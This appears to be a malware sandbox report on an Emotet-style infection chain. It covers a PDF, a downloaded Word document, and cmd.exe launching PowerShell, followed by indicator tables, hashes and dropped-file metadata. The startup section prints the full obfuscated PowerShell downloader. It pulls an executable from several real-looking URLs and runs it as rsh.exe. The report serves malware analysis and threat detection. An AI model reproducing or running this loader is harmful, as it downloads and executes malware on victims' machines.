	Emotet.doc	e8d15f18de1824f772b9b299d5878a6901a61847b7f926e315f95e613dcc626f	malicious	Browse	50.62.160.71
	Deactivation Notice.pdf	fb52a436a25154cbca134f5b22049f5e4d3182bc6a01d5b1f6fa2a5b8ba09fc1	malicious	Browse	184.168.221.37
	http://www.provinsi.com.my/INFO/New-invoice-80566233/		malicious	Browse	166.62.27.63
	http://www.vvw1.com/Corporation/Invoice/		malicious	Browse	160.153.16.40
	23system@noemai.exe	5802c38dffd1caea47ab2b0ad91fa94bcdc0e5c10d5e9a2bfeed5b04d63f92e8	malicious	Browse	50.63.202.1
	smart-soft.pl/wef346645		malicious	Browse	146.255.36.1
	http://frizpee.com/storage/avatar/DropNewVasion/Fresh/		malicious	Browse	160.153.16.8
	http://ten.assurancecredit.quebec		malicious	Browse	50.63.202.25
	http://yobit.com/		malicious	Browse	50.63.202.47
	25Titanuim Air experts Quotation.exe	6c754be4d4bb7b2088e4f8d863a50fb68638ccb6fb9bf77695ee702bb4d06096	malicious	Browse	107.180.51.29
	Emotet.doc	0a6d8c964286f1ec0173cde38caf3d5e36147945baaa83a0200e6f35f82446af	malicious	Browse	97.74.181.1

Dropped Files

No context

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Startup

System is w7_1

AcroRd32.exe (PID: 3696 cmdline: 'C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe' 'C:\Users\user\Desktop\DOC-642857352.pdf' MD5: 513659580A49DF6A85CDFD869895924A)

AcroRd32.exe (PID: 3820 cmdline: 'C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe' --channel=3696.0.183658897 --type=renderer 'C:\Users\user\Desktop\DOC-642857352.pdf' MD5: 513659580A49DF6A85CDFD869895924A)

iexplore.exe (PID: 1992 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' http://avrasyaorganizasyon.net/5087642DQPJSQC/BIZ/US MD5: EE79D654A04333F566DF07EBDE217928)

iexplore.exe (PID: 1156 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:1992 CREDAT:275457 /prefetch:2 MD5: EE79D654A04333F566DF07EBDE217928)

WINWORD.EXE (PID: 3048 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\12SKZKHD\PAYMENT _223848OEIWWWS.doc MD5: 5D798FF0BE2A8970D932568068ACFD9D)

cmd.exe (PID: 308 cmdline: 'C:\Windows\System32\cmd.exe' /c C:\Windows\system32\cmd.exe /V/C'set NO= }}{hctac}}kaerb;miZ$ ssecorP-tratS;)miZ$(elifotevas.icW$;)ydoBesnopser.pFo$(etirw.icW$;1 = epyt.icW$;)(nepo.icW${ )'*ZM*' ekil- txetesnopser.pFo$( fI;)(dnes.pFo$;)0,kkN$,'TEG'(nepo.pFo${yrt{)jLw$ ni kkN$(hcaerof;'maerts.bdoda' moc- tcejbO-weN = icW$;'ptthlmx.2lmxsm' moc- tcejbO-weN= pFo$;)'exe.hsr\'+)(htaPpmeTteG::]htaP.OI.metsyS[(=miZ$;)'@'(tilpS.'ZQgHugt/ehcac/rotartsinimda/ur.sur-yelwon//:ptth@4VdQeG/moc.steemerutnev//:ptth@I4ow42l/20000/tnetnoc-pw/ra.ude.tnu.noisnetxeairaterces//:ptth@Zt5waA/moc.sruotocetpyge//:ptth@Vwguf1ym/moc.ruot-xnihps//:ptth'=jLw$;'Hww'=Ftz$ llehsrewop&&for /L %U in (601;-1;0)do set jtC=!jtC!!NO:~%U,1!&&if %U equ 0 powershell '!jtC:*jtC!=!' ' MD5: AD7B9C14083B52BC532FBA5948342B98)

cmd.exe (PID: 1496 cmdline: C:\Windows\system32\cmd.exe /V/C'set NO= }}{hctac}}kaerb;miZ$ ssecorP-tratS;)miZ$(elifotevas.icW$;)ydoBesnopser.pFo$(etirw.icW$;1 = epyt.icW$;)(nepo.icW${ )'*ZM*' ekil- txetesnopser.pFo$( fI;)(dnes.pFo$;)0,kkN$,'TEG'(nepo.pFo${yrt{)jLw$ ni kkN$(hcaerof;'maerts.bdoda' moc- tcejbO-weN = icW$;'ptthlmx.2lmxsm' moc- tcejbO-weN= pFo$;)'exe.hsr\'+)(htaPpmeTteG::]htaP.OI.metsyS[(=miZ$;)'@'(tilpS.'ZQgHugt/ehcac/rotartsinimda/ur.sur-yelwon//:ptth@4VdQeG/moc.steemerutnev//:ptth@I4ow42l/20000/tnetnoc-pw/ra.ude.tnu.noisnetxeairaterces//:ptth@Zt5waA/moc.sruotocetpyge//:ptth@Vwguf1ym/moc.ruot-xnihps//:ptth'=jLw$;'Hww'=Ftz$ llehsrewop&&for /L %U in (601;-1;0)do set jtC=!jtC!!NO:~%U,1!&&if %U equ 0 powershell '!jtC:*jtC!=!' ' MD5: AD7B9C14083B52BC532FBA5948342B98)

powershell.exe (PID: 1640 cmdline: powershell 'powershell $ztF='wwH';$wLj='http://sphinx-tour.com/my1fugwV@http://egyptecotours.com/Aaw5tZ@http://secretariaextension.unt.edu.ar/wp-content/00002/l24wo4I@http://venturemeets.com/GeQdV4@http://nowley-rus.ru/administrator/cache/tguHgQZ'.Split('@');$Zim=([System.IO.Path]::GetTempPath()+'\rsh.exe');$oFp =New-Object -com 'msxml2.xmlhttp';$Wci = New-Object -com 'adodb.stream';foreach($Nkk in $wLj){try{$oFp.open('GET',$Nkk,0);$oFp.send();If ($oFp.responsetext -like '*MZ*') {$Wci.open();$Wci.type = 1;$Wci.write($oFp.responseBody);$Wci.savetofile($Zim);Start-Process $Zim;break}}catch{}} ' MD5: 92F44E405DB16AC55D97E3BFE3B132FA)

powershell.exe (PID: 3420 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' =wwH MD5: 92F44E405DB16AC55D97E3BFE3B132FA)

rsh.exe (PID: 2616 cmdline: 'C:\Users\user\AppData\Local\Temp\rsh.exe' MD5: ECDBFA5FA4DE3282C7E8D00F73617144)

rsh.exe (PID: 1220 cmdline: C:\Users\user\AppData\Local\Temp\rsh.exe MD5: ECDBFA5FA4DE3282C7E8D00F73617144)

AcroRd32.exe (PID: 3808 cmdline: 'C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe' /b /id 3000_8762 /if pdfshell_sh9b3f8bf1-1e2c-4514-b721-04f1240671c4 --shell-broker-channel=broker_pdfshell_shb848e49c-307c-4242-8ab2-d00ee16010cc MD5: 513659580A49DF6A85CDFD869895924A)

AcroRd32.exe (PID: 3636 cmdline: 'C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe' --channel=3808.0.1048347210 --type=renderer --shell-broker-channel=broker_pdfshell_shb848e49c-307c-4242-8ab2-d00ee16010cc /b /id 3000_8762 /if pdfshell_sh9b3f8bf1-1e2c-4514-b721-04f1240671c4 MD5: 513659580A49DF6A85CDFD869895924A)

OSPPSVC.EXE (PID: 2844 cmdline: C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE MD5: 358A9CCA612C68EB2F07DDAD4CE1D8D7)

echoshims.exe (PID: 3712 cmdline: C:\Windows\system32\echoshims.exe MD5: ECDBFA5FA4DE3282C7E8D00F73617144)

echoshims.exe (PID: 3460 cmdline: C:\Windows\system32\echoshims.exe MD5: ECDBFA5FA4DE3282C7E8D00F73617144)

cleanup

Created / dropped Files

C:\Users\user~1\AppData\Local\Temp\wwwB4E.tmp
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<https://ieonline.microsoft.com/#ieslice>), ASCII text, with CRLF line terminators
Size (bytes):	324
Entropy (8bit):	4.872866254997385
Encrypted:	false
MD5:	5DDF93B98C5AE2C79C09BFA87363078D
SHA1:	71BA59BB8429DFA73A5DD73502E0098A6308CF1E
SHA-256:	F5E35EA56DBF3FDB1A6EDC8C4B26B170FE9512F8DDDAE56353B5DD03D6FB1386
SHA-512:	5EA667BE4746FAF1AF72149D2C18B3BE72C7379ABE95E42140C266B531D6E2FAF4ECD9F8C31B03F82AA578240AAC863E2EAFBD17700425757B749784877CD862
Malicious:	false
Reputation:	high, very likely benign file

C:\Users\user~1\AppData\Local\Temp\wwwB6E.tmp
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<https://ieonline.microsoft.com/#ieslice>), ASCII text, with CRLF line terminators
Size (bytes):	411
Entropy (8bit):	4.951621068409854
Encrypted:	false
MD5:	480D8EF58C50B63649CA2A11A6DD21CA
SHA1:	FF65A43FC6514B94D815E123DCC87543DFEB3509
SHA-256:	A0E38252764186742D382B06CDF904BB849EA9C84A19C22B7380F32089735228
SHA-512:	8F07279D9234D17C8D2F890F18D6D07A64F22002B39B51956F2DAFD38D6EF46C261B7F756B858108CC996A95A7CE92F8AD08ADABF996B81291E49CD247D32AE0
Malicious:	false
Reputation:	high, very likely benign file

C:\Users\user~1\AppData\Local\Temp\wwwB8E.tmp
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<https://ieonline.microsoft.com/#ieslice>), ASCII text, with CRLF line terminators
Size (bytes):	452
Entropy (8bit):	4.992732757554899
Encrypted:	false
MD5:	431CE3C728B963E531AC57ED03AD7885
SHA1:	4E59DD95CB200BD87778F26DE2C078D943BD0532
SHA-256:	928B92D61A40EC12A97B69BFD1743747EEEFBB07CD5C91BD5F4C3A1FAF6A64F1
SHA-512:	7F0A79E04A7C0471631B54E38E3377E041B221E7A891278ADA5ECEFE2367AB728F8FE3F5A71DA1815C23800CC5028BFCB6B3A7936142241D5DD732D05DEEC11B
Malicious:	false
Reputation:	high, very likely benign file

C:\Users\user~1\AppData\Local\Temp\~DF813EEAC87A33DE9B.TMP
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	data
Size (bytes):	30409
Entropy (8bit):	1.6533577860389996
Encrypted:	false
MD5:	3D81E977A81E95FF15EB6E3358C3B57B
SHA1:	C32648D13E79D70468C5258A7F0FF7C46582DA80
SHA-256:	0DB3C28929F492077AF2269F132B25009BA275A42004EDBE7CB543CECABC61A5
SHA-512:	64EC1E7D374F5F98134C25F122CF0FB89C778A720380F837FE988FDAF53E28FDFDEE4247151FA708FC8DBB45C391ED113E5173258473EBF0DEBEF6DD700DBD12
Malicious:	false
Reputation:	low

C:\Users\user~1\AppData\Local\Temp\~DFFBEA5A766499AE13.TMP
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	data
Size (bytes):	13029
Entropy (8bit):	1.7901664200877754
Encrypted:	false
MD5:	867316303F5B82EB45712A0BE31B4250
SHA1:	09A6AE08413951B8C55C1A3042ADBC7304EDAD86
SHA-256:	05870CD081436F77A126F7813F41D2B28DDF901ED94D54A843B1B6E32BBD7E16
SHA-512:	FF715E814FB70CED277B7B90C2C5FC95458E41F058B5B022C70B16451BB493CE3B03D2F5A67F28EB606FB89FEDDC0F388F3D7AFE1EE08E1B875FFDB8554F5796
Malicious:	false
Reputation:	low

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\11.0\ReaderMessages
Process:	C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
File Type:	SQLite 3.x database, last written using SQLite version 3007010
Size (bytes):	193536
Entropy (8bit):	5.643611015671053
Encrypted:	false
MD5:	8E5CEED9035EBB1DE3ADBF20ADEC5F64
SHA1:	0A8D2E3C7B246549CAB53844A07B408CDC008135
SHA-256:	2F6A5737D61174A4BE594A4D05D5E1B1C81DAE8C9701536D899CFBE6C542F644
SHA-512:	8746A2F87BDD387C37DA607F04EC9C2EDD6522C6707D8B2D1518413D35F4C2076853ABD27962852D86BE037377C9CE399BED5843013ECD0D806669C91C8D7C9D
Malicious:	false
Reputation:	low

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\11.0\ReaderMessages-journal
Process:	C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
File Type:	data
Size (bytes):	223060
Entropy (8bit):	5.022606923976962
Encrypted:	false
MD5:	C3F0045CD9401F8DE6A9C00EFB17082E
SHA1:	9762042B4F8C8F7E2DF5D14CCC06750CAB1B170A
SHA-256:	2B01452A477EBA43EBAFC2B00B82559B6387457E2A7F0149314414DB3E30B74B
SHA-512:	7A7283E6BF7B33EEEE5262BDB7CA35B55269B117A6344D0DB971E5DCFBBAA7231FE067F8008A5E4BD1689023ED564E87811AA3A765485EAC4C03F9A86DB8EDF2
Malicious:	false
Reputation:	low

C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 4-bit colormap, non-interlaced
Size (bytes):	237
Entropy (8bit):	6.1480026084285395
Encrypted:	false
MD5:	9FB559A691078558E77D6848202F6541
SHA1:	EA13848D33C2C7F4F4BAA39348AEB1DBFAD3DF31
SHA-256:	6D8A01DC7647BC218D003B58FE04049E24A9359900B7E0CEBAE76EDF85B8B914
SHA-512:	0E08938568CD123BE8A20B87D9A3AAF5CB05249DE7F8286FF99D3FA35FC7AF7A9D9797DD6EFB6D1E722147DCFB74437DE520395234D0009D452FB96A8ECE236B
Malicious:	false
Reputation:	high, very likely benign file

C:\Users\user\AppData\Local\Adobe\Acrobat\11.0\AdobeFnt14.lst.3820
Process:	C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
File Type:	PostScript document text
Size (bytes):	139657
Entropy (8bit):	5.085541180117917
Encrypted:	false
MD5:	BB3C006DBE0D274C4A16E9291F717D68
SHA1:	10CFD34184B26E7467F4D4B0B824ED133E416604
SHA-256:	1352CD3E1029E7A1051C232893DE9E3AA4510EF93B97EDCA3323953E81A9FA12
SHA-512:	30C6E1A506EF5C766FE47377C3A3B1BED166B71B5577D7CC201289FF3FBA8274DA37F1954E163362A6356E21C05473B0D04FC3860F3E80D1406BB7DF75FEC5BD
Malicious:	false
Reputation:	moderate, very likely benign file

C:\Users\user\AppData\Local\Adobe\Acrobat\11.0\Cache\AdobeFnt14.lst.3820
Process:	C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
File Type:	PostScript document text
Size (bytes):	8244
Entropy (8bit):	5.161502934866559
Encrypted:	false
MD5:	F2CDFE655739BC4EED03AD6BCA23A2E7
SHA1:	48EF62A7CD41CFC77F0C23117D41FF8B01D66474
SHA-256:	33DE66BC03817D94F1CF0B8D45AA87E7A243CB78169623AB80345BC2D86E207B
SHA-512:	A6298AB7BA54C5CC8EC15356349BCCF931F50284827B0132554B6033299B10A7C1CDF68556BE87ABB9CF27CC7DA5C0050675C51230BE7D197755AD9D4A8A1FD7
Malicious:	false
Reputation:	moderate, very likely benign file

C:\Users\user\AppData\Local\Adobe\Acrobat\11.0\UserCache.bin
Process:	C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
File Type:	data
Size (bytes):	112494
Entropy (8bit):	6.202560637470928
Encrypted:	false
MD5:	63AE77896AB2D8A58149F1B090A8D260
SHA1:	F9B4A5FA92C234777F7D970F03F675AC2EB9A50F
SHA-256:	DCE0A9B8DA36536CF8CD3152A8E5E079ACDA2D3555B64E37DCB85183DDD84291
SHA-512:	12FED54B271160FC3AA1B44600FF1E3E29B3DECFA7491AD7C024A190EA4F32B4E51A4E7A35FAB1DE21713083BA385F6D78FA9BF40CB12108D97FF5A90773ED62
Malicious:	false
Reputation:	moderate, very likely benign file

C:\Users\user\AppData\Local\Microsoft\Feeds\FeedsStore.feedsdb-ms
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	data
Size (bytes):	33282
Entropy (8bit):	3.2010638005784884
Encrypted:	false
MD5:	16732DADB9DFD9AE401D65CC67C051D0
SHA1:	8990E1C88A1059A9890047400BC669C610AB378D
SHA-256:	4B885E3027D655EAEB71CF25D58B83919FAD013CF2336369142202B7F43CAB42
SHA-512:	D395B5F00D3B3A313AF3F3BB81580E328EB127A3A96BD074556B7E0285201E7829931EB2ABBA735632DF73A5BA240463DA0B054C36D241394EECB68847226B6E
Malicious:	false
Reputation:	low

C:\Users\user\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\Suggested Sites~.feed-ms
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Size (bytes):	61952
Entropy (8bit):	1.1276631661652194
Encrypted:	false
MD5:	B357932BE9AE9DE9B31D3522A1147E4F
SHA1:	69CE1DE8C6174C7FF59F6D49DBC950230D601BE8
SHA-256:	D0AEBC2ACB3E20ADBAC524213FF01C05D482433821DAEB15ECABD2F9699360CC
SHA-512:	8EAA830E291C14E27CBC9BEF69764D408E34340DE097E80FBC40840BA7BAA2362B1A902F212D5810E280018EB03443A7C9A2A6E5C9042E5ACC505E9AB6EE4222
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{6C5EA242-F244-11E8-A8F7-B808CF8DE4F2}.dat
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	Microsoft Word Document
Size (bytes):	34904
Entropy (8bit):	1.7907588224728435
Encrypted:	false
MD5:	1825B55C7A3675341985E58BA28D0423
SHA1:	5D5357AC18A0900F0EE90E32EE4259CFCA768087
SHA-256:	5E8B973B0E882CB377EF0BC66C1F7F8E6ABB99F018457465BAFEDDD4E9BECBB6
SHA-512:	8A547E96A4259E20B9F680C2501FF9017163A9374961406CE6F2691758F00C6C19B840EBA6508991EC46B5B05256A95FBE308E4BDB5BC1B053C167B7E91279A6
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{6C5EA244-F244-11E8-A8F7-B808CF8DE4F2}.dat
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	Microsoft Word Document
Size (bytes):	18840
Entropy (8bit):	1.712773123701745
Encrypted:	false
MD5:	B8D33AE871322F5B0523169BD7D3B782
SHA1:	D8CD8A34F84664589EA6CF4951ECA31C766C5F92
SHA-256:	C6EA7B2C6F9965A37E315E9EACD752FBB975F3A4912273FE284FCCF41A6249B2
SHA-512:	45196BC4E13CB9906E8E0898EEF3E527247B390C3A5AF22EDDF45C10115ABF922F6CDD8A49AC7F8B2DC34856B81BE0A3B257BCC8A792D69A6FC415FE19F32B3E
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-2845162440\msapplication.xml
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Size (bytes):	707
Entropy (8bit):	5.083313544147811
Encrypted:	false
MD5:	847E9CAA7227D67ABDF191E7445BA062
SHA1:	8EBA7617045E53DFBD2F5A1EB9D31897E2DA5B53
SHA-256:	922F22D90739519906416B16FAC8B641CEB5D45BC5C6A885151D279FC43B2D85
SHA-512:	AE5BFDED994946C5F052FE720BDE21E240600AED3C46B93E5E5BE59EF27B9A8C9B70644261CD027AC95B3D7133C7DEB4BBF48FC604D6A8320DFC67E9681580A2
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\12SKZKHD\PAYMENT _223848OEIWWWS.doc.3sjibq6.partial
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	0
Size (bytes):	86656
Entropy (8bit):	6.262341261004912
Encrypted:	false
MD5:	280B7E0B2DD3F2B4F874BE02A09BF617
SHA1:	C5A64317F5488008FFC2F9506B31EA50596C6E51
SHA-256:	440DB958EE26DC3126EBA0D949C18C931D296CA619747620C9805B54F069C2B4
SHA-512:	9F2F228B3DB1F3D4A1887C05D5FB38FC48F9BBE9B0A663FBEED30E82A41440A44CA0BD89DED83BA7CA7F8EFC504A683BB2BA0B6A0D04822BADACF59E7795446F
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\12SKZKHD\PAYMENT _223848OEIWWWS.doc.3sjibq6.partial:Zone.Identifier
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	ASCII text, with CRLF line terminators
Size (bytes):	26
Entropy (8bit):	3.9500637564362093
Encrypted:	false
MD5:	FBCCF14D504B7B2DBCB5A5BDA75BD93B
SHA1:	D59FC84CDD5217C6CF74785703655F78DA6B582B
SHA-256:	EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
SHA-512:	AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\12SKZKHD\PAYMENT _223848OEIWWWS.doc:Zone.Identifier
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	very short file (no magic)
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
MD5:	ECCBC87E4B5CE2FE28308FD9F2A7BAF3
SHA1:	77DE68DAECD823BABBB58EDB1C8E14D7106E83BB
SHA-256:	4E07408562BEDB8B60CE05C1DECFE3AD16B72230967DE01F640B7E4729B49FCE
SHA-512:	3BAFBF08882A2D10133093A1B8433F50563B93C14ACD05B79028EB1D12799027241450980651994501423A66C276AE26C43B739BC65C4E16B10C3AF6C202AEBB
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\J3HU7253\urlblockindex[1].bin
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	data
Size (bytes):	16
Entropy (8bit):	1.6216407621868583
Encrypted:	false
MD5:	FA518E3DFAE8CA3A0E495460FD60C791
SHA1:	E4F30E49120657D37267C0162FD4A08934800C69
SHA-256:	775853600060162C4B4E5F883F9FD5A278E61C471B3EE1826396B6D129499AA7
SHA-512:	D21667F3FB081D39B579178E74E9BB1B6E9A97F2659029C165729A58F1787DC0ADADD980CD026C7A601D416665A81AC13A69E49A6A2FE2FDD0967938AA645C07
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UUY831YK\US[1].htm
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with CRLF, LF line terminators
Size (bytes):	1147
Entropy (8bit):	5.218695284732051
Encrypted:	false
MD5:	13211BBB7A0B02D21338BF6009996FEC
SHA1:	AFB3BB17CEC670E672DAFFE609058AD863B26BE4
SHA-256:	BD1B7A943CCFA2D9A9CEA6AAEE3ECB66F3DB4A292AC31E7EDAE2794653CF7B7C
SHA-512:	18A317EB56B0675A68B7DFB5DB17AC11C9A4D28F3239D6E8B796032BF33FA1E2C841F1CD74628346CC7CDC156F7D060300EC4E1FFDC40950FF9FEEE2E2381B7B
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UUY831YK\my1fugwV[1].htm
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	HTML document, ASCII text
Size (bytes):	240
Entropy (8bit):	5.168664804323275
Encrypted:	false
MD5:	ED6842EB79F346C3A76A913A2803025C
SHA1:	CBB067BCC57762D75A7A5789DB560F7227C6D3FF
SHA-256:	59C691038509B532C39FA94271FE92417B01BEA09B987306E2DF76BEF66E30F2
SHA-512:	740E9C9F2F274A5E8072F1ED1FB707791B8FF480086936CB942FA12A6DA350EE3C50BF81BFA9C4FF6EC1C3ED94B162C29A91967FEB5419358827E059194155DB
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VTLKCR8Y\PAYMENT _223848OEIWWWS[1].doc
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	0
Size (bytes):	86656
Entropy (8bit):	6.262341261004912
Encrypted:	false
MD5:	280B7E0B2DD3F2B4F874BE02A09BF617
SHA1:	C5A64317F5488008FFC2F9506B31EA50596C6E51
SHA-256:	440DB958EE26DC3126EBA0D949C18C931D296CA619747620C9805B54F069C2B4
SHA-512:	9F2F228B3DB1F3D4A1887C05D5FB38FC48F9BBE9B0A663FBEED30E82A41440A44CA0BD89DED83BA7CA7F8EFC504A683BB2BA0B6A0D04822BADACF59E7795446F
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VTLKCR8Y\favicon[1].ico
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 4-bit colormap, non-interlaced
Size (bytes):	237
Entropy (8bit):	6.1480026084285395
Encrypted:	false
MD5:	9FB559A691078558E77D6848202F6541
SHA1:	EA13848D33C2C7F4F4BAA39348AEB1DBFAD3DF31
SHA-256:	6D8A01DC7647BC218D003B58FE04049E24A9359900B7E0CEBAE76EDF85B8B914
SHA-512:	0E08938568CD123BE8A20B87D9A3AAF5CB05249DE7F8286FF99D3FA35FC7AF7A9D9797DD6EFB6D1E722147DCFB74437DE520395234D0009D452FB96A8ECE236B
Malicious:	false

C:\Users\user\AppData\Local\Temp\acrord32_sbx\FAP4E75.tmp
Process:	C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
File Type:	ASCII text, with no line terminators
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
MD5:	098F6BCD4621D373CADE4E832627B4F6
SHA1:	A94A8FE5CCB19BA61C4C0873D391E987982FBBD3
SHA-256:	9F86D081884C7D659A2FEAA0C55AD015A3BF4F1B2B0B822CD15D6C15B0F00A08
SHA-512:	EE26B0DD4AF7E749AA1A8EE3C10AE9923F618980772E473F8819A5D4940E0DB27AC185F8A0E1D5F84F88BC887FD67B143732C304CC5FA9AD8E6F57F50028A8FF
Malicious:	false

C:\Users\user\AppData\Local\Temp\rsh.exe
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Size (bytes):	159744
Entropy (8bit):	6.237309496584697
Encrypted:	false
MD5:	ECDBFA5FA4DE3282C7E8D00F73617144
SHA1:	B7F428D79FFC76577A66D351631EAD8FE63F73CD
SHA-256:	27D427AADEE0E362B72F541F3E236B136BEF133169C6D1D345F214E186CA147D
SHA-512:	C5BD8B9ECDCA1C46C988678EDAC31F3B6AB80BD626021C0C7BFB601F1A63F294CD5DA2BCF2900BA54BFC5EADCE37ED02627861B3C8AACE1A21AA4A51C6857027
Malicious:	true

C:\Users\user\AppData\Roaming\Adobe\Acrobat\11.0\Security\Annss.dat
Process:	C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
File Type:	data
Size (bytes):	225
Entropy (8bit):	6.845378985460743
Encrypted:	false
MD5:	D98BDBD45587307CFCF5D2DD5036EF1B
SHA1:	429B176FE2DD3EE0CDB0B535E0C8F0B1E3FC0C22
SHA-256:	B0966270987ABECCF7AC0920F4D4FCCF8F81DAEEE66135C0311E1B4A61CCDD5A
SHA-512:	AE868AA7B46D6C52D24A0C5A610138BB125340BBAA7868E8B31ACEB39B776E290DD6A456AECE180F9FC2F5DDBD7A95D020DE25AE41B9A9125DDE47AB12691ACC
Malicious:	false

C:\Users\user\AppData\Roaming\Adobe\Acrobat\11.0\Security\Annssi.dat
Process:	C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
File Type:	data
Size (bytes):	777
Entropy (8bit):	7.722141813492641
Encrypted:	false
MD5:	06A77A95444A35B407C24EF7D5D565F9
SHA1:	7C14B4DFEF64641BEE95419D0A217A0905234422
SHA-256:	1F6BEEBEFFBC93BE648B7C76EB5CDCF663134DDA39F016EFF4AF4EB9DD33CC7A
SHA-512:	C5DDD64976C2DC171AC5554B37DFC4F06D3FA7CB9086720A5772019596B60555590B41E8A99AE75F6FE35F231886633741F0D37EBDF032386685092D8E3A5AC9
Malicious:	false

C:\Users\user\AppData\Roaming\Adobe\Acrobat\11.0\Security\Annssk.dat
Process:	C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
File Type:	data
Size (bytes):	264
Entropy (8bit):	6.478344301712117
Encrypted:	false
MD5:	5A3C303EA449FF9B9C00E5214E24E61B
SHA1:	5091625F8F6C5978C0CE9FDA3B1ECD3EFAB0CC94
SHA-256:	AECD2C137573456CB1FCE8C492F8413CA2D513D981A63FA5EA5FB3E72D3A2012
SHA-512:	09BBE5067CF4CB5E79E5C8E2F5E613EC7B392E5C65646D044256762AD94175598913A7C2E23012EEE7B4B5DB3D285FD78CCF83FFAE804ECD09135B25284FBAE9
Malicious:	false

C:\Users\user\AppData\Roaming\Adobe\Acrobat\11.0\Security\services_rdr.dat
Process:	C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
File Type:	data
Size (bytes):	1561
Entropy (8bit):	7.803613818422967
Encrypted:	false
MD5:	D46DBB868FFE500DFDFDCCF6157EA8E4
SHA1:	654D3D56F9955A2583E7FC0805958A046B7FDCA7
SHA-256:	CF1DB4E05693799201E18C7BA042376D42D98AC2BDB85BBD879C3115BD7A5EBC
SHA-512:	C38FE1F78B59489FBE401DAEF40B9D8C3FFC947E8593C7374F0DF30A5809BF4BA195D34CD58A4E2F40198F97EB1CDDD0F4C2E2ABBC432D0D3BEC48303A56D715
Malicious:	false

C:\Users\user\AppData\Roaming\Adobe\Acrobat\11.0\Security\services_rdri.dat
Process:	C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
File Type:	data
Size (bytes):	4761
Entropy (8bit):	7.958708286333836
Encrypted:	false
MD5:	7A626D77B5FB6E7169EF4625F5C4AD0F
SHA1:	51236750EB53F3050C31B028A26A53E27B6C2D20
